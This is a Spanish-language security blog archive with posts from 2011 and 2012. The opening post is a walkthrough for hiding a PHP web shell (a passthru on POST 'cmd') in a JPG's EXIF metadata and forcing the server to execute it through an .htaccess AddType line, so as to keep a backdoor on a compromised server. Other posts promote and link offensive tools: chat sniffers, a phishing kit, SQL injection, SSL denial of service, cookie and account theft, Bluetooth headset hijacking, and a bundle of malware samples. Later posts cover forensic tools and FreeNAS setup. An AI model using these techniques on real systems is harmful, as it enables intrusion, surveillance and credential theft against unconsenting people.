Mostrando entradas con la etiqueta programa. Mostrar todas las entradas
Mostrando entradas con la etiqueta programa. Mostrar todas las entradas

jueves, 19 de abril de 2012

Ocultando codigo PHP en los metadatos de un JPG

Resulta sencillo usar los metadatos EXIF de una imagen JPEG para ocultar código PHP, por ejemplo para dejar un backdoor en la imagen de nuestro avatar en un servidor ya comprometido.


Existen varias herramientas para manipular los metadatos EXIF. Entre todos ellos una de las mejores herramientas para esto es jhead. Para empezar seleccionamos nuestra imagen JPG y miramos sus metadatos con jhead:

C:\>jhead h33z.jpg
File name    : h33z.jpg
File size    : 71384 bytes
File date    : 2012:04:17 14:31:40
Resolution   : 492 x 369
Para insertar nuestro código PHP introducimos:

C:\>jhead -ce h33z.jpg

A continuación se introduce el código PHP que queramos ocultar como por ejemplo:

  • "<?php passthru($_POST['cmd']); __halt_compiler();" -> El cual nos permite ejecutar un comando a la maquina con peticiones POST gracias a la funcion passthru.
Una vez que hemos ocultado el código en la imagen, tendremos que forzar que el servidor web maneje un fichero jpg como si fuera un fichero php. Para ello añadiremos AddType en el fichero .htaccess del directorio de las imágenes. Como ejemplo:

C:\>echo AddType application/x-httpd-php .jpg >> d:\htdocs\server\images\.htaccess

Una vez hecho esto tendremos nuestra imagen ejecutando el código PHP sin problemas.
Esta técnica serviría en un servidor ya comprometido en el cual pudiéramos modificar el fichero .htaccess para que  nuestro JPG ejecutara código.

Enlace de descarga jhead: http://www.sentex.net/~mwandel/jhead/

sábado, 25 de febrero de 2012

Sniffers para Whatsapp y Tuenti Chat

Aquí os dejo dos herramientas mas o menos recientes que actúan como sniffer para captar los datos enviados por estas dos aplicaciones ya que utilizan el mismo protocolo XMPP (una tecnología de comunicación en tiempo real muy potente y utilizada actualmente) y envían todo bajo texto plano...


Tuenti Chat - Tuenti Sniffer

El chat de tuenti usa el protocolo XMPP, una potente y actual tecnología de comunicación en tiempo real muy extendida y usada en WhatsApp (aunque este usa una modificación de xmpp realmente). Cuando nos conectamos, tuenti asigna de forma aleatoria un servidor situado de 1 a 9 quedando por ejemplo xmpp1.tuenti.com.

Los mensajes enviados no van en cifrados, de modo que cualquier persona puede leerlos, obtener el userid que corresponde a que personas envían los mensajes y a que personas los reciben, y más.

Tuenti Sniffer es capaz de leer las conversaciones de tuenti que pasen por la red local.
Y es capaz también de suplantar o robar su ID y capturar los datos enviados durante la conversación en el chat de tuenti.

-Enlace para la descarga: 
(*es necesario tener instalado Java 6 JRE y la librería JPCap 0.7)



Whatsapp - Whatsapp Sniffer

Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos. Whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano. Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.

WhatsAppSniffer que muestra en consola todas las conversaciones, identificadores y demás que pasan por la red cuando se está usando whatsapp. Una forma mucho mas cómoda y fácil de obtener estos datos que usando otros sniffers como wireshark.





viernes, 16 de diciembre de 2011

Listado de herramientas de esteganografía

En un paper de Pedram Hayati se puede observar este listado que incluye hasta un total de 111 herramientas de esteganografía y estegoanálisis clasificadas por categorías. El estudio se realizó desde un perspectiva forense para identificar que herramientas están disponibles en Internet y cuáles de ellas podrían ser utilizadas por diferentes organizaciones. 

Las herramientas se agrupan segun sean para imagenes (con codigo fuente disponible o no), para sonidos, para textos, para archivos de sistema y discos duros, y para archivos con diferentes extensiones como ".doc", ".jpeg", ".gz", ".exe", ".dll"...


También se incluyen herramientas para estegoanálisis.


Aqui os dejo el paper completo:
Survey of Steganography and Steganalytic Tools



Descarga del paper: http://www.pedramhayati.com/images/docs/survey_of_steganography_and_steganalytic_tools.pdf

lunes, 28 de noviembre de 2011

[Phishing] Social Engineering Ninja v0.4

Social Engineering Ninja es una popular herramienta escrita en PHP la cual contiene poderosas herramientas para ataques de ingeniería social, su punto fuerte es el área del phishing ya que contiene varias copias falsas de sitios web famosos para capturar contraseñas y puede ejucatar exploits en navegadores actualizados. Actualmente su ulima versión es esta, la 0.4.


Entre la lista de paginas web falsas que contiene se encuentran:
- Amazon.com
- Twitter.com
- Facebook.com
- Gmail.com
- Paypal.com
- Yahoo.com
- Digg.com y otras muchas más...

Como metodos encontramos dos tecnicas bastante utilizadas como tabnapping y un XSS stealing que podemos usar para infectar algun dominio o aprovechar algun XSS de forma masiva en alguna red social o pagina web famosa..

En el menu del programa podemos ver herramientas de phishing, un mailer, herramienta para tabnabbing, exploits, un packer, un uploader, un xss stealer y otra herramienta para capturar IPs.

- Instalación:
La instalación resulta bastante sencilla:
- Copiamos la carpeta descomprimida al servidor.
- Cambiamos el archivo de configuración por los datos de nuestra base de datos y servidor
. El archivo se encuentra en /config/config.php.
- Ingresamos desde el navegador en la web en la carpeta /install/ y seguimos los pasos hasta completar la instalación.

- Protección:
Para evitar estas técnicas de phishing es conveniente mirar la direccion de la pagina web en la que estamos antes de dar nuestros datos...
Seninja-fake-addr.png
Seninja-good-addr.png
O bien comprobando el certificado de seguridad de la pagina web:
Seninja-checkcert.png 

- Capturas de pantalla:  





















- Descarga:
Social Engineering Ninja v0.4

lunes, 21 de noviembre de 2011

sqlsus 0.7.1 - Herramienta para inyeccion SQL

Sqlsus es un programa de codigo abierto escrito en perl para testear y realizar ataques sql injection. Desde la linea de comandos del programa se puede conseguir la estructura de la base de datos, introducir tus propias cadenas SQL, descargar archivos del servidor web, rastrear el servidor en busca de directorios con permisos de escritura, cargar y ejecutar un backdoor, clonar la base de datos y mucho mas. Sqlsus se centra en la rapidez y en la eficiencia, optimizando el espacio de la inyeccion SQL y haciendo los mejores usos de las funciones de MySQL. Usa un poderoso algoritmo que permite capturar mas datos generados por el servidor. Sqlsus es muy veloz a la hora de conseguir datos y estructuras de bases de datos. Si los privilegios son los suficientes sqlsus puede ser lo suficientemente util como para cargar un backdoor en el servidor a traves de SQLi. En la version 0.7, sqlsus soporta time-based blind injection y detecta automaticamente el servidor web.

Aquí los cambios de la nueva versión en inglés:
  • Added time-based blind injection support (added option “blind_sleep”, and renamed “string_to_match” to “blind_string”).
  • It is now possible to force sqlsus to exit when it’s hanging (i.e.: retrieving data), by hitting Ctrl-C more than twice.
  • Rewrite of “autoconf max_sendable”, so that sqlsus will properly detect which length restriction applies (WEB server / layer above). (removed option “max_sendable”, added options “max_url_length” and “max_inj_length”)
  • Uploading a file now sends it into chunks under the length restriction.
  • sqlsus now saves variables after each command, so that forcing it to quit (or killing it) will not discard the changes that were made.
  • Added a progress bar to inband mode, sqlsus now determines the number of rows to be returned prior to fetching them.
  • get db (tables/columns) in inband mode now uses multithreading (like everything else).
  • clone now uses count(*) if available (set by “get count” / “get db”), instead of using fetch-ahead.
  • In blind mode, “start” will now test if things work the way they should, by injecting 2 queries : one true and one false.
  • sqlsus now prints what configuration options are overridden (when a saved value differs from the configuration file).

Descarga:
sqlsus-0.7.1.tgz

miércoles, 16 de noviembre de 2011

w3af v1.1 programa para auditar y atacar paginas web

w3af es un programa para auditar y atacar paginas web. El objetivo del proyecto es crear una aplicación para encontrar y explotar vulnerabilidades de aplicaciones Web que es fácil de usar y desarrollar.

w3af y sus plugins están completamente escritos en python. El proyecto tiene más de 130 plugins para comprobar inyección SQL, cross site scripting (XSS), la inclusión de archivos locales y remotos, y mucho más...

Puedes descargar w3af aquí:
 w3af-1.1.tar.bz2

lunes, 14 de noviembre de 2011

Tecnicas de pentesting y analisis de servidores y aplicaciones


Aqui os dejo un paper bastante interesante y completo desarrollado por CSIRT-cv, junto con INTECO-CERT el cual es un informe que analiza diferentes técnicas y herramientas para recolectar información de la red.

El informe tiene como principales objetivos, en primer lugar proporcionar el conocimiento que ayude a las organizaciones y organismos a ver qué información se encuentra expuesta y accesible de manera pública en Internet y por otro lado, concienciar de los riesgos de una mala gestión de la información, y cómo esta mala gestión puede ser aprovechada por terceros.

El paper utiliza la programas incluidos en la ultima distribución de Backtrack.
Podeis descargaros el informe en el siguiente enlace.

viernes, 11 de noviembre de 2011

Identificar vulnerabilidades en Joomla y Wordpress

Los mayores problemas de seguridad de los gestores de contenido más populares como Wordpress o Joomla, suelen venir por la instalación de plugins que no están lo suficientemente revisados y auditados.  Analizar uno de estos CMS es sinónimo de conocer que plugins tiene e identificar las vulnerabilidades que les afecta.



Con ese propósito estan: Plecost para Wordpress y JoomlaScan para Joomla.

Plecost, está desarrollada en python la última versión es la 0.2.2-9 y está integrada en distribuciones como Backtrack 5.

Joomlascan, está desarrollado en perl la última versión es la 1.3. Este script también permite auto actualizarse, identifica plugins y reporta vulnerabilidades potenciales, tanto del core del CMS, como de plugins instalados.


jueves, 10 de noviembre de 2011

Compilado de Malware conocidos

Aquí os dejo un total de 59 malwares pre-compilados para poder analizar su codigo fuente, algunos muy conocidos y buscados como melissa, chernobyl, backorifice... La descarga se compone de 5 partes de 12 MB cada una.



  • Bagle
  • BatzBack
  • Beatrix
  • Biennale
  • Blackbat
  • Blaster
  • BloodRed
  • Caribe
  • Chernobyl
  • CodeBlue
  • CodeRed
  • Dbot 3.1
  • Dos
  • ErrorPage
  • Esenin
  • Ferox
  • Firefly
  • Happy99
  • Irc-Worm
  • Klex-H
  • Letum
  • Lion
  • LittlePain
  • Matrix.A
  • Mescalina
  • MichelAngelo
  • Morris
  • MscanWorm
  • Mydoom
  • Myspace Worm
  • MyTob.Y
  • MyWebSearch
  • Netsky
  • Nimda
  • Parite
  • Piece
  • Ramen
  • Sadmind
  • Santy
  • Sasser
  • Sdbot
  • Sharp
  • Sircam
  • Slammer
  • Slapper
  • Sobig
  • Spawn
  • Stoned
  • SyntaxError
  • Tamiami
  • Tirannis
  • Trojan
  • Veelasco
  • Worm
  • Wratharage
  • Yahasux
  • Yourdoom
  • ZeroBoard
  • Zotob


  • Descarga:

    Vía: ar3sw0rmed.com.ar

    miércoles, 9 de noviembre de 2011

    Rec Studio 4 – Reverse Engineering Compiler & Decompiler

    REC Studio es un decompilador interactivo el cual lee un arcivo ejecutable ya sea de windows, linux o Mac OS X y intenta producir una representacion del codigo en C usado para crear ese programa.

    REC Studio 4 usa tecnicas de analisis avanzadas como Single Static Assignment (SSA) y permite cargar archivos de Mac OS X y binarios en 32 y 64 bits.





    Aunque sigue en desarrollo presenta muchas nuevas mejoras respecto a su version anterior REC Studio 2.

    Caracteristicas:
    - Multiobjetivo: REC puede decompilar 386 (x86 y x86_64), 68k, PowerPC MIPS R3000 y programas Sparc.

    - Multiformato: REC reconoce los siguientes formatos de fichero: o ELF (System V Rel. 4, por ejemplo Linux, Solaris etc.) o PE (Win32 .EXE y .DLL para Microsoft Windows 95 y XP) o Raw binary data (vía ficheros .rpj)

    - Multihost: REC está disponible para Linux (i386), Windows XP y Mac OS X 10.6.

    - Simbólico: soporta la información de definiciones simbólicas de alto nivel en ELF/Dwarf2 con soporte parcial para leer ficheros PDB de Microsoft. Los tipos de fichero en formato texto (como la salida objdump de GNU) permiten la definición de tipos por parte del usuario sin necesidad de compilar a ELF/Dwarf2. El soporte para formatos antiguos como COFF y STABS se añadirá en un futuro.

    - Interactivo: el usuario puede inspeccionar el código generado y añadir y guardar la información para ayudar a mejorar la calidad de la salida decompilada.

    Aunque REC puede leer los ejecutables Win32 (PE) generados por Visual C++ o Visual Basic 5 hay limitaciones en los resultados obtenidos. REC intentará utilizar toda la información de la tabla de símbolos del ejecutable pero si el EXE fue compilado sin información de depuración, si se utilizó un formato PDB o C7 o si se habilitó la opción de optimización la salida producida no será muy buena.

    Descarga:

    Windows – RecStudioWin.zip
    Ubuntu – RecStudioLinux.tgz
    Mac – RecStudioMac.tgz

    Fuente: darknet.org.uk

    miércoles, 2 de noviembre de 2011

    [DoS/DDoS] THC SSL Tool

    THC-SSL-DOS es una herramienta para comprobar el rendimiento de las conexiones SSL. Establecer una conexion segura requiere 15 veces mas procesamiento en el servidor que en el cliente. Esta herramienta usa esa propiedad para sobrecargar el servidor y provocar que se caiga. Este problema afecta a todas las implementaciones de SSL.






    Ejemplo de uso:

    ./thc-ssl-dos 127.3.133.7 443
    Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
    Secure Renegotiation support: yes
    Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
    Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
    Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
    Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
    Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
    Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
    Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
    - Los servidores normalmente suelen hacer 300 handshakes por segundo. Esto requeriria 10-25% del CPU de un portatil.
    - El puerto HTTPS (443) no es siempre el mejor para realizar los ataques. Prueba tambien con otros puertos y servicios como POP3S, SMTPS, ...

    Descarga:

    lunes, 31 de octubre de 2011

    [Linux] DEFT (Digital Evidence & Forensic Toolkit)

    DEFT (Digital Evidence & Forensic Toolkit) es una distribución Live CD (booteable desde el CD) basada en Ubuntu con kernel 2.6.35, muy fácil de usar, con un grandísimo listado de herramientas forenses y con una excelente detección del hardware.


    DEFT es una de las distribuciones de análisis forense que más han avanzado en estos últimos años, no solo han añadido una gran cantidad de herramientas forenses a su lista, sino que se han sabido adaptarse a su entorno y emular las características de otras distribuciones similares CAINE de donde se han inspirados para sacar el DEFT Extra.
    DEFT (Digital Evidence & Forensic Toolkit) está dividida en dos, su entorno y herramientas booteables que recogen lo mejor del software libre para el análisis forense y DEFT Extra un conjunto de herramientas gratuitas para análisis forense en entornos Windows.
    En DEFT podemos encontrar las siguientes herramientas para realizar Análisis Forense:

    • sleuthkit 3.2.0, collection of UNIX-based command line tools that allow you to investigate a computer
    • autopsy 2.24, graphical interface to the command line digital investigation tools in The Sleuth Kit
    • DFF 0.8
    • dhash 2.0.1, multi hash tool
    • aff lib 3.6.4, advanced forensic format
    • disk utility 2.30.1, a partition manager tool
    • guymager 0.5.7, a fast and most user friendly forensic imager
    • dd rescue 1.14, copy data from one file or block device to another
    • dcfldd 1.3.4.1, copy data from one file or block device to another with more functions
    • dc3dd 7, patched version of GNU dd to include a number of features useful for computer forensics
    • Xmount 0.4.4, convert on-the-fly between multiple input and output hard disk image types
    • foremost 1.5.6, console program to recover files based on their headers, footers, and internal data structures
    • photorec 6.11, easy carving tool
    • mount manager 0.2.6, advanced and user friendly mount manager
    • scalpel 1.60, carving tool
    • wipe 0.21
    • hex dump, combined hex and ascii dump of any file
    • outguess 0.2 , a stegano tool
    • ophcrack 3.3.0, Windows password recovery
    • Xplico 0.6.1 DEFT edition, advanced network analyzer
    • Wireshark 1.2.11, network sniffer
    • ettercap 0.7.3, network sniffer
    • nmap 5.21, the best network scanner
    • dmraid, discover software RAID devices
    • testdisk 6.11, tool to recover damaged partitions
    • ghex, light gtk hex editor
    • vinetto 0.6, tool to examine Thumbs.db files
    • trID 2.02 DEFT edition, tool to identify file types from their binary signatures
    • readpst 0.6.41, a tools to read ms-Outlook pst files
    • chkrootkit, Checks for signs of rootkits on the local system
    • rkhunter 1.3.4, rootkit, backdoor, sniffer and exploit scanner
    • john 1.7.2, john the ripper password cracker
    • catfish, file search
    • galletta 1.0
    • pasco 1.0
    • md5sum, sha1sum, sha224sum, sha256sum, sha512sum
    • md5deep, sha1deep, sha256deep
    • skype log view, skype chat conversation viewer
    • Xnview, viewer graphics, picture and photo files
    • IE, Mozilla, Opera and Chrome cache viewer
    • IE, Mozilla, Opera and Chrome history viewer
    • Index.dat file analyzer
    • pdfcrack, cracking tool
    • fcrackzip, cracking tool
    • clam, antivirus 4.15
    • mc, UNIX file manager
    Descargar DEFT (ultima versión) 
     Fuente: dragonjar

    domingo, 30 de octubre de 2011

    FOCA 3.0 listo para descargar

    FOCA es una herramienta para la realización de procesos de fingerprinting e information gathering en trabajos de auditoría web. La versión Free realiza búsqueda de servidores, dominios, URLs y documentos publicados, así como el descubrimiento de versiones de software en servidores y clientes. FOCA se hizo famosa por la extracción de metadatos en documentos públicos, pero hoy en día es mucho más que eso. Aqui os dejo la presentación del programa en la DEFCON 18 muy completa:


    Descarga: 

    FOCA 3.0

    jueves, 20 de octubre de 2011

    Robando cookies con Surfjack

    SuftJack es una herramienta escrita en python con la cual es posible robar cookies con tan solo tener acceso al trafico de una red. Con esta herramienta se han encontrado vulnerabilidades en sitios web importantes. Un atacante puede facilmente robar cookies de sesión en sitios que usen HTTP y HTTPS, y no aseguren las cookies.





    Aqui os dejo un paper con información mas detallada sobre el programa:
    Paper:
    http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf (En Inglés pero bastante util)


    Un video con Gmail como ejemplo:

    Pagina del proyecto: http://code.google.com/p/surfjack/downloads/list

    domingo, 16 de octubre de 2011

    [Programacion] Overbypass.pl herramienta para comprobar uploaders

    Aqui os dejo una herramienta en perl muy útil que nos permite auditar y comprobar uploaders para ver si son vulnerables y que tipo de archivos se pueden subir.

    Codigo (PERL):
    Untitled

    Según la opción que se elija se mandará una petición HTTP de tipo POST con el contenido de una shell usando un tipo de bypass. A parte de las técnicas para evitar los filtros que puedes seleccionar, la shell siempre se manda con el  Content-Type emulando a una imagen, así como al inicio de la shell lleva la cabecera de los archivos con extensión .gif.

    viernes, 14 de octubre de 2011

    TuentiDump: comprometiendo y descargando cuentas de tuenti

    TuentiDump que monitoriza el tráfico y descarga todo el contenido de la cuenta de Tuenti comprometida, almacenando en una base de datos (SQLite) toda la información (permitiendonos un análisis posterior más cómodo).

    La aplicación descarga la información personal del usuario (nombre, apellidos, dirección, teléfonos, email , twitter, páginas web, ...), los mensajes del tablón/wall, las imágenes y su información y los mensajes privados. Hay alguna información cuya obtención no ha sido implementada (tablones y comentarios en imágenes) que es sencillo de añadir pero que en este caso no me ha preocupado.

    La descarga y almacenamiento de la información se realiza en tres etapas.
    1. Se realizan todas las peticiones web necesarias guardando en bruto (sin procesar) las respuestas. De esta forma conseguimos reducir al máximo el tiempo en el que el SessionID ha de ser válido.
    2. Se procesa toda la información obtenida en la etapa anterior dejando los datos listos para almacenarlos en la base de datos. Además, en esta etapa se pueden descargar todas las imágenes de la cuenta (para acceder a éstas no es necesario estar autenticado)
    3. Se genera la base de datos y se almacena en ella toda la información.
    Ahora bien, lo más importante ... ¿cuanto tiempo tarda?.
    En las pruebas que he realizado con mi portatil (algo limitado) la etapa de descarga (que es la crítica) tarda alrededor de 120 segundos (la limitación se encuentra tanto en el equipo como en la conexión). En la universidad y con un equipo más decente conseguí bajar la cifra a 50 segundos (lo más lento es la descarga de los datos de las imágenes, desactivandolo los tiempos se reducen a la mitad).

    La aplicación permite elegir el número de hilos, las páginas del tablon (10 elementos por página) y las de imágenes (25 elementos por página) que se procesaran por cada hilo. Es recomendable jugar con estos parámetros para conseguir el máximo rendimiento.

    Con respecto a los datos obtenidos, la información más interesante/crítica se suele encontrar en los mensajes privados. Por lo tanto, lo que un atacante seguramente no hubiera visto simplemente suplantando la cookie, ahora sí que queda expuesto.

    A continuación podéis ver una captura de TuentiDump descargando mi cuenta de Tuenti, los tiempos completos y la estructura de la base de datos que genera:






    Con respecto a la aplicación, no es ninguna maravilla (y claramente Java no era la mejor opción) pero para las pruebas era suficiente. Le he corregido algunos bugs y he publicado su código fuente en:
    http://www.ldelgado.es/?tuentidump

    Como conclusión decir que con esta aplicación simplemente quería dar cifras a algo ya conocido y mostrar como hasta la más mínima exposición puede comprometer al completo nuestra cuenta y permitir a un atacante analizar, con todo el tiempo que necesite, toda la información contenida en la misma.
     
    Fuente: securitybydefault.com

    jueves, 13 de octubre de 2011

    Hackarmoury: pack de herramientas de seguridad

    HackArmoury es un repositorio de aplicaciones y utilidades de seguridad que como peculiaridad y característica más importante es su facilidad de acceso.
     

    Para facilitar en estas tareas, HackArmoury permite descargar el las utilidades mediante Samba, TFTP, FTP, RSync, SVN, y HTTP y HTTPS, tanto IPv4 como IPv6.
     
    La lista de aplicaciones no es muy amplia, pero poco a poco imaginamos y esperamos que vaya creciendo.



    Esta web me ha recordado otra realmente práctica y no excesivamente conocida; el live de sysinternals, a la que se puede acceder mediante SMB (\\live.sysinternals.com) y también dispone de un listado de directorio con todas las utilidades: http://live.sysinternals.com/


    Y para finalizar, recordaros que Nirsoft tiene una herramienta llamada "NirLauncher" que facilita la descarga y actualización de sus propias aplicaciones, así como las de Sysinternals, joeware y piriform.

     
    Fuente: securitybydefault.com

    viernes, 1 de abril de 2011

    Generador de trafico

    Bueno les dejo la URL de un generador de trafico el cual lo probe en backtrack 4 y funciona perfectamente:

    URL donde bajarlo: http://www.perihel.at/sec/mz/#download

    Para instalarlo se necesitan :

    1.-apt-get install cmake
    2.-apt-get install libpcap0.8-dev
    3.-apt-get install libnet1-dev
    4.-apt-get install libcli-dev

    Luego descomprimimos la carpeta, entramos a ella y solo ejecutamos:
    1.- cmake .
    2.- make
    3.- make install

    y Listo ya lo tenemos instalado en nuestro sistema.

    Ahora lo ejecutamos con los siguientes parametros para generar trafico en nuestra red:



    Eso es todo.

    martes, 15 de marzo de 2011

    Headsets Hijacking [Ataque Via Bluetooth]

    ¿En que consiste la tecnica?
    Consiste en un ataque que afecta a dispositivos Manos Libres Auriculares, ya que del mismo modo que los dispositivos Manos Libres de automóvil, incorporan la vulnerabilidad del código de seguridad Bluetooth (clave PIN) por defecto. Cualquier atacante podría emparejarse con el dispositivo Manos Libres Auriculares y acceder a sus funciones de audio. El hecho de incorporar una clave PIN por defecto (por ejemplo, 0000) en un dispositivo Bluetooth significa que cualquier usuario con conocimiento de esa clave estándar puede emparejarse con el dispositivo y comunicarse con él de forma autorizada.
    En el caso de un Manos Libres Auriculares, un atacante podría acceder a las funciones de audio implementadas en el terminal y llevar a cabo las siguientes acciones con fines maliciosos para que funcione el ataque es importante que el dispositivo Manos Libres esté activado pero no en uso en el momento del ataque, es decir, que no esté cursando una llamada telefónica para realizar el ataque aremos uso de tres elementos importantes la herramienta Car Whisperer para linux, Una antena unidireccional para incrementar el alcance del adaptador Bluetooth y detectar dispositivos a mayor distancia Una Tablet PC Nokia 770, que corre sobre Linux, para controlar el portatil de su mochila de forma inalámbrica y pasar desapercibido mientras lleva a cabo el ataque.Realmente hace un poco el paripé ya que el ataque podría ser desarrollado perfectamente desde la Tablet PC Nokia 770 si la herramienta Car Whisperer estuviera portada a Maemo, la plataforma de desarrollo de las Tablet PC de Nokia con Linux, al igual que otras herramientas del grupo Trifinite.

    Capturar el audio recogido por el micrófono del dispositivo


    Inyectar audio que sería reproducido por el auricular.




    Enlaces:

    Descargar Carw Hisperer 0.2


    Fuente: diosdelared.com

    martes, 8 de marzo de 2011

    Crea tu propio NAS con FreeNAS

    Tienes la idea de centralizar todos tus datos a través de un servidor conectado en la red. Tienes el hardware y los discos duros para hacerlo. FreeNAS es todo lo que un usuario puede llegar a necesitar a la hora de conectar unidades de almacenamiento enlazadas por red. Extremadamente popular, en constante desarrollo, y con una amplia documentación, FreeNAS es tu primera y tal vez única parada en el mundo de los NAS.


    Para instalarlo, primero necesitamos la ISO correspondiente. Lo más recomendado es la última versión estable.
    La descargamos de aquí:

    http://www.freenas.org/

    Una vez descargada y quemada, arrancamos el equipo desde ese CD.

    Lo primero que nos sale es un menú de inicio, en el que bien podemos dejar para que arranque con la opción por defecto o bien podemos teclear "1" e Intro.


    Después dejamos que el CD haga su trabajo, hasta que nos deje en un menú con 9 opciones, del siguiente tipo:

    1) Assign interfaces
    2) Set Lan IP address
    3) Reset webGUI password
    4) Reset to factory defaults
    5) Ping host
    6) Shell
    7) Reboot system
    8) PowerOff system
    9) Install/Upgrade to an hard drive/flash device, etc.

    Lo primero será instalar, es decir, la opción 9.



    En la siguiente ventana tendremos (más o menos) las siguientes opciones:

    1) Install 'embedded' OS on HDD/Flash/USB
    2) Install 'embedded' OS on HDD/Flash/USB + data partition
    3) Install 'full' OS on HDD + data partition
    4) Upgrade 'embedded' OS from CDROM
    5) Upgrade 'full' OS from CDROM
    6) Upgrade and convert 'full' OS to 'embedded'



    Yo, por lo que tengo que hacer, selecciono la opción 3, voy a instalar el sistema completo en un disco duro. Selecciono entonces la opción que mejor me viene y después OK. Este proceso instalará el SO en el equipo, y me devolverá a esta ventana. Una vez instalado, selecciono EXIT y me devuelve al menú anterior.


    Configuración

    Ya tengo el sistema instalado, pero tengo que configurarlo. Para hacerlo, lo hago desde el menú anterior, asignándole una IP (de un rango que llegue, claro) desde la opción 2). Me preguntará primero si quiero trabajar por DHCP, que le diré que no, y después los datos de la conexión: IP, máscara, GW y DNS. Con todos estos datos, reinicia la conexión y ya tengo acceso a la red.

    Al devolvernos al menú, es recomendable hacer una prueba: con la opción 5) puedo lanzar un ping a una máquina de esa red que sepa que responderá. Así compruebo que la red está bien levantada.

    Una vez llegados a este punto, nos conectaremos desde otro ordenador de la misma red por el puerto 80. Abriremos un navegador y pondremos la IP, y accederemos a la administración web del FreeNAS. Lo primero será logarnos. Por defecto, si no se ha modificado, los datos son admin/freenas.

    Una vez dentro, hay dos cosas prioritarias

    1) Configurar/grabar la configuración de la interfaz de red. Vamos a Network --> LAN y aquí podremos ver la configuración de red que tenemos en este momento. Revisamos que esté todo OK y hacemos click en SAVE. Todavía no reiniciamos.

    2) Configurar los discos, y lo hago desde Disks --> Management, y formateamos/configuramos el disco/los discos como mejor nos convenga. Una vez finalizado, le damos a SAVE y ahora sí que reiniciamos.

    Volvemos a conectarnos y comprobamos que no tenemos problemas y que los datos se han guardado correctamente.

    Una vez ya tenemos la configuración básica, es interesante que nos demos una vuelta por todas las características que ofrece esta aplicación, de lo más completo que hay por ahí.

    Fuente : neoteo y freenas